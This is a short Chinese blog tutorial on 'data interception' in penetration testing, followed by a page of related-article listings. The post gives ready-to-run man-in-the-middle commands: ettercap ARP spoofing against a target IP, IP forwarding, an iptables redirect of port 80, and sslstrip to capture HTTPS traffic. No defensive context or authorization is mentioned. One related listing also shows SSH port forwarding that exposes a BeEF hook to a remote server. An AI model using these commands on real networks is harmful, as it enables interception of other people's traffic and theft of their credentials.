渗透测试之数据监听

最新推荐文章于 2024-04-03 11:50:11 发布

原创最新推荐文章于 2024-04-03 11:50:11 发布 · 424 阅读

2 ·

CC 4.0 BY-SA版权

文章标签：

#渗透测试 #信息安全

渗透测试专栏收录该内容

9 篇文章

订阅专栏

本文详细介绍了如何使用Ettercap进行HTTP数据监听，包括设置中间人攻击并配合Wireshark抓包，以及如何通过iptables和SSLstrip实现HTTPS数据的拦截和信息获取，涉及ARP欺骗技巧。

HTTP数据监听

首先使用Ettercap工具对靶机实施中间人攻击：

ettercap -Tq -M arp:remote /192.168.199.129// /192.168.199.2//

接着即可利用wireshark抓包工具监听靶机的数据包了。

HTTPS数据监听

首先需要开启路由转发：

echo 1 > /proc/sys/net/ipv4/ip_forward

接着通过iptables 将所有HTTP数据导入到自己指定的一个端口（如9999）：

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9999

然后使用SSLstrip监听上面指定的9999端口，获取靶机传输的信息：

sslstrip -a -1 9999

最后实施ARP欺骗即可。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

_Buran_

关注关注

1
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

渗透服务器修改数据,渗透测试之：从端口入侵服务器

weixin_42617406的博客

07-31

2201

Web应用服务端口渗透HTTP服务：对于http服务其实是我们目前这几年比较常见的攻击入口，所以这里会针对http服务进行一个详细的详解；注：这个板块的所有攻击方式，如果涉及到常规的web漏洞不会提出来，除非是特定的服务器才会产生的漏洞；IIS服务默认端口：80/81/443攻击方式：IISPUT写文件：利用IIS漏洞，put方法直接将文件放置到服务器上短文件名泄漏：这种一般没啥影响解析漏洞：详细...

渗透测试（三）4类核心渗透测试工具详解

最新发布

这里是数字化与人工智能的 “实验场” 与 “瞭望台”

08-27

1155

先用Nmap“摸清目标”，再用OpenVAS/Nessus“排查漏洞”，接着用Wireshark“分析细节”，最后用Metasploit“实战验证”——这是一套完整的渗透测试流程；工具只是“实现手段”，比如同样是扫漏洞，OpenVAS和Nessus各有优劣，关键是你知道“要扫什么漏洞”“怎么解读结果”；永远记住“合法合规”：渗透测试的核心是“保护系统”，不是“破坏系统”，所有测试都必须获得授权，否则可能触犯法律。

参与评论您还未登录，请先登录后发表或查看评论

数据监听

weixin_33845881的博客

04-04

141

对象的监听 es5的Object.defineProperty是关键，一个已经定义好的对象，我们可以利用Object.defineProperty方法重写它的属性，添加get,set方法。 var obj = { name:"小明", age:18, say(){ return "hello"; } } for(let key in obj){ ...

VX数据侦听

HcwDavid12的博客

07-01

245

实现小程序中的数据侦听最近接触的taro项目中使用了VX，因此记录一下了解到的内容，原文在小程序项目中, 我们的通常会使用到使用到一个全局对象作为各个页面通用的数据存储容器, 将它绑定到app对象后, 就能在每一个页面都自由的操纵这个对象. 然而在实践中, 由于这个对象及其属性不具备响应式条件, 它不能直接参与业务逻辑的编写, 能力仅仅局限于数据储存. 若是在VueJS项目中, 我们可能经常使用到Vue.$watch去侦听某个数据是否发生变化, 小程序却缺乏这种能力. 在这篇文章中, 我将用150行代码

Vue数据侦听

weixin_43837268的博客

06-19

494

1.Watch data( ) { return { 'first':1 } }, watch: { first(newValue,oldValue) { console.log('新值--->>>',newValue) console.log('旧值--->>>',oldValue) } } ...

【渗透测试笔记】之【将本地beef侦听的端口远程端口转发到云服务器】

AA8j的博客

12-27

636

1. 首先配置vps的ssh，允许外部访问vps端口： vi /etc/ssh/sshd_config 将 #GatewayPorts no 改为： GatewayPorts yes 2. vps添加防火墙规则，运行外网访问7000端口，并重启vps： 3. 在kali上进行远程端口转发，将本地beef侦听的3000转发到vps的7000端口上： ssh -CfNg -R 7000:127.0.0.1:3000 root@1.2.3.4 CfNg参数作用是压缩带宽，后台并发连接。末尾跟vpsIP

源码vue中对数据侦听的一些理解---对象篇图文

weixin_46613543的博客

08-19

174

vue的数据侦听流程图：先放一张自己画的图，在继续向下看；（自己画的将就看看）在vue2中，对于一个数据要被侦听，则是通过Object.definedProperty来实现，这个估计大家都知道。那么具体概述就是：在getter中收集依赖，在setter中通知依赖更新看一点源码： function defineReactive (obj,key,val) { if (arguments.length === 2) { val = obj[key] } if(typeof val =

读书笔记之python渗透测试.docx

04-13

### 读书笔记之Python渗透测试知识点汇总 #### 黑盒测试工具 1. **Burp Suite**：一种常用的集成平台，用于执行Web应用程序的安全测试。它包含多种工具，如Proxy、Intruder、Spider等，可以帮助用户发现并利用Web...

渗透测试的车联网通信安全与防范措施研究.pdf

07-16

在车联网通信安全方面，渗透测试可以通过模拟攻击者的手段，深入分析通信协议的弱点，同时检测车联网系统内部是否能够有效隔离、控制权限，以及是否能够防止数据泄露和保护隐私等。为应对车联网通信安全问题，以下...

渗透测试.pdf

07-15

基于网络的渗透测试中，ARP嗅探是一种常见的技术，它通过网卡设置为混合模式来捕获网络数据，可以捕获密码、机密信息或完整会话。ARP嗅探器是插入网络中用于监听通信的设备，而ARP攻击则是通过伪造IP地址和MAC地址来...

2020最新渗透测试靶机和工具及教程

05-30

搜集的渗透测试的靶场，有Bwapp综合靶场练习 webug综合靶场练习 DVWA综合靶场练习 pikachu靶场练习 uploads文件练习 SQlilabs注入练习 ZVulDirll综合靶场，全部封装在虚拟机中，渗透工具封装在另一虚拟机中。

网络监听攻击技术

xo2000的专栏

10-03

3025

前言：　　在网络中，当信息进行传播的时候，可以利用工具，将网络接口设置在监听的模式，便可将网络中正在传播的信息截获或者捕获到，从而进行攻击。网络监听在网络中的任何一个位置模式下都可实施进行。而黑客一般都是利用网络监听来截取用户口令。比如当有人占领了一台主机之后，那么他要再想将战果扩大到这个主机所在的整个局域网话，监听往往是他们选择的捷径。很多时候我在各类安全论坛上看到一些初学的爱好者，在他们认为

推荐10款好用的网络安全渗透测试工具

weixin_59191169的博客

04-03

3580

推荐10款好用的网络安全渗透测试工具

尝试使用ettercap监听

Syou的博客

04-05

5180

局域网：vmware虚拟网卡下NAT模式。代号主机名 ip地址主机A Kali Linux 32位 192.168.233.129 主机B Kali Linux 64位 192.168.233.131 攻击机C Kali Linux 32位 192.168.233.130 （注意，攻击机C的ip是*.130，夹在A和B中间，不要搞混）在攻击机终端上分别输入arp和ifconfig，查看本地局域网内mac地址映射关系。 [外链图片转存失败,源站可能有防盗链机制,建议将图片保

ettercap+arpspoof进行HTTP信息嗅探

weixin_33742618的博客

11-30

1378

准备：kali、xp kali ip:192.168.14.157 目标ip：192.168.14.158 目标网关：192.168.14.2 使用工具：ettercap、arpspoof 一.工具介绍与使用二.具体实战演示一.工具介绍与使用 1.ettercap的介绍ettercap有两种运行方式，UNIFIED和BRIDGED。UNIFIED的方式是...

渗透测试学习之靶机DC-3

xdbzdgx的博客

11-12

7949

1.下载靶机本篇文章是DC靶机系列的第三篇，针对的是靶机DC-3，建议感兴趣的读者从DC-1开始练习，详细内容可以看我之前的文章。 DC-3的下载地址为DC: 3.2 ~ VulnHub。三个地址建议使用磁力下载，比较快。下载后解压为.ova文件，该格式可直接在VMware上打开，如果显示打开失败，点击重试即可成功，如果仍无法成功可百度、谷歌解决。需要说明的是DC-3相较前两个靶机，它只有一个flag，便是最后一个flag，没有多余的提示了。在VMware加载成功之后显示如下界面：默.

Scapy:sniff函数剖析（参数分析）

m0_71713477的博客

01-11

5952

Scapy中sniff函数的剖析（参数分析）

python udp报文解析,python 处理传输层的报文 TCP/UDP

weixin_39956110的博客

03-25

705

from scapy.all import *alarm_map= {"211": "未系安全带", "205": "疲劳驾驶", "206": "疲劳驾驶", "208": "抽烟", "209": "出现异常"}defscan(target, port):has_no_connect=TruewhileTrue:#根据接口进行监听报文#接口获取由 IFACES 决定try:#sniff开始获取...

Vue3快速上手（十）数据变化监视之侦听器watch和watchEffect

一掬净土

02-19

2307

监视ref定义的基本类型的数据，实际是观察.value的变化。// 监视sum的变化, 返回值是一个停止监听函数})页面效果如下：从图上可以看出：1、成功监听了a.value的变化2、监听返回一个函数，是停止函数，可以在特定条件下，调用其来停止监听。stopWatch的输出如下图，其功能性显而易见。监听对象时，监听的是对象地址的变化，如果只是对象属性值的变化，则不会被监听。

Metasploit渗透测试指南全新修订版

《Metasploit 渗透测试指南》可能会包含如何利用Metasploit收集目标系统的相关信息，如操作系统版本、开放的端口、运行的服务等，以及如何对这些数据进行分析和利用，为后续的渗透测试提供支持。安全测试人员在...